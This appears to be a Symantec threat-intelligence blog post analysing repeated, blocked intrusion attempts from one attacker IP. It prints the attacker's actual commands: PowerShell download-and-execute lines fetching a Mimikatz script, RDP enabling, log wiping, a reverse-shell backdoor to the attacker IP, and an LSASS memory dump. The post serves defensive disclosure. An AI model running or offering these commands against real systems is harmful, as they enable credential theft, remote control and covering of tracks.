Attacks from Malicious IP Hit Multiple Machines in Several Countries

Persistent attempted attacks from a typical cyber crime actor were consistently thwarted by Symantec techonologies. Our team examines this activity.

Not every attack we investigate results in discovering sophisticated attackers and achieving a comprehensive end-to-end understanding of the attack. For every attack we publish in detail, thousands of others are triaged by automation and, of those, we manually investigate dozens that never see public documentation other than ensuring protection in our products.

This article documents a classic case of a likely small cyber crime operation, possibly even a single individual with uncertain or only opportunistic goals. Thousands of these types of attacks are being conducted daily, but end up thwarted and so are not publicized.

Background

While investigating attempted attack techniques on our customers’ machines, we saw repeated malicious downloads from the IP 45.77.78.133. By pivoting on the IP, we were able to see that multiple other machines were also being targeted. Digging more into the machines in which the suspicious IP was found, we found the attacker has used multiple techniques from downloading and executing malicious PowerShell scripts to attempting to dump credentials and gaining access via Remote Desktop.

We have identified a relatively small — less than 40 — set of victim machines that have traces of suspicious activities related to IP 45.77.78.133, with most of the victims located in the U.S., Canada, and Mexico. The activities related to this IP were seen as recently as March 2020. While such a low number of infections could be a mark of a targeted attack, in this case, the type and diversity of the victim profiles indicates the attack is a small, opportunistic operation. The end goal of the attacker is unknown as in all our observed cases they were thwarted before a final payload was delivered. In one case, we observed a machine that had an attempted Jsworm ransomware infection as well, but this may be unrelated and a case of two attackers coincidentally breaching the same machine.

Case Study

How the attacker initially gains access to a victim machine is unknown, but in all observed cases the initial operations are conducted via PsExec, so the attacker already has credentials for victim machines. However, despite having credentialed access via PsExec, the attacker repeatedly attempts to establish an interactive Remote Desktop session instead. These attempts may be because a visual interactive session is simpler for the attacker or because the attacker’s remote PsExec actions continued to fail due to being blocked by Symantec Endpoint Protection, and the attacker likely did not understand why their actions were failing.

The first action the attacker tries is using an open source PowerShell script to inject Mimikatz and dump credentials using the sekurlsa::logonpasswords function.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://45.77.78.133/Invoke-Adios.ps1'); Invoke-Adios"

The attacker attempts to perform this command repeatedly because they are unable to see the command has been blocked by Symantec EndPoint Protection.

Later, on different machines, the attacker replaces the Invoke-Adios.ps1 script with an updated version from the Github of the original author of the script, likely thinking their version has some bug or compatibility issue.

powershell “IEX (New-Object Net.WebClient).DownloadString(‘https:///invokemimiadios.ps1'); Invoke-mimiadios -DumpCreds”

After failing to dump credentials, the attacker then begins to set up a Remote Desktop session. The attacker creates a Windows firewall exception rule to allow Remote Desktop connections and then enables Remote Desktop through the registry.

netsh advfirewall firewall set rule [EC3] new enable=yes
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

Using the same open source PowerShell script, the attacker then uses the Mimikatz function to attempt to patch Remote Desktop to allow more than one simultaneous RDP connection, which is again blocked by Symantec Endpoint Protection.

powershell -ver 2 “IEX (New-Object Net.WebClient).DownloadString(‘http://45.77.78.133/Invoke-Adios.ps1'); Invoke-Adios -Command ‘ts::multirdp’”

We assume that the attacker then attempted to make a Remote Desktop connection that failed, and no further attacker activity is seen on the machine until days later.

The attacker becomes active again and tries to run the commands that we have seen before to enable RDP and ensure RDP is allowed through the Windows firewall.

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh advfirewall firewall set rule new enable=yes

However, this time they also try to add a user to the RDP local group before attempting their RDP connection.

CSIDL_SYSTEM\net1 localgroup “Remote Desktop Users” /add [machinename\username]

However, this is also blocked by Symantec Endpoint Protection and the attacker’s RDP connection also fails so, a few seconds later, in order to clean up their failed attempt, they clear all event logs and restore the victims console session.

powershell “wevtutil el | Foreach-Object {wevtutil cl $_}”
qwinsta
tscon 2 /dest:console

Months later, the attacker attempts a new strategy by executing a generic PowerShell backdoor that allows any PowerShell commands to be executed via the network.

CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe while (1)
{
$client = New-Object System.Net.Sockets.TCPClient(‘45.77.78.133’,19032);
…[Removed]
}

The attacker attempts to establish the backdoor network connection repeatedly, but because the command is blocked by Symantec Endpoint Protection, the connection never succeeds. The attacker then attempts the same backdoor, but this time encoded in BASE64, which is again blocked repeatedly.

CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe -e dwBoAGkAbABlACAAKAAxACkA … [Removed]

In one earlier case, the attacker also attempted to download a full-featured Powershell toolkit to store and execute from the registry.

“CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe” -E dwBoAGkAbABlACgAMQApAHsA … [Removed]
“CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe” -c “$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion Certificate).Certificate);powershell -E $x”

The toolkit has the ability to capture keystrokes, obtain browser stored credentials, and capture clipboard content and web post content.

As the attacker’s primary means to obtain additional credentials continually failed, in some cases, the attacker was also seen attempting to dump credentials by taking a direct memory dump of the LSASS process.

CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $((get-process lsass).id) C:\Windows\lsass_$(Get-Date -Format " dd-MM-hh-mm-ss").dmp full"

Despite being persistent and coming back repeatedly and sometimes weeks later, we never observed any further exploitation beyond these repeated and ultimately failed attempts to dump credentials and establish a further foothold on these machines.

Conclusion

These attacks represent a large portion of the attacks we see on a daily basis — attackers using PowerShell to breach a system, and attempting to gain credentials to further their attack. However, these kinds of attacks are almost uniformly blocked and fail to fully breach a system, even with pre-obtained credentials and access, like in this case.

In this case, while most of the artifacts are off-the-shelf PowerShell scripts seen used by many other attackers, this attacker uniquely and consistently used the IP address 45.77.78.133 to conduct their attacks. If others have observed similar activity from this IP address, especially a machine that was fully breached, that would be of interest to understand the ultimate scope and motivation of this attacker.

Check out the Threat Intelligence blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.

Like this story? Recommend it by hitting the heart button so others on Medium see it and follow Threat Intel on Medium for more great content.

Attacks from Malicious IP Hit Multiple Machines in Several Countries was originally published in Threat Intel on Medium, where people are continuing the conversation by highlighting and responding to this story.

Article Link: https://medium.com/threat-intel/attacks-from-malicious-ip-hit-multiple-machines-in-several-countries-e5bb4efe3ca7?source=rss-8f2689cdc4f------2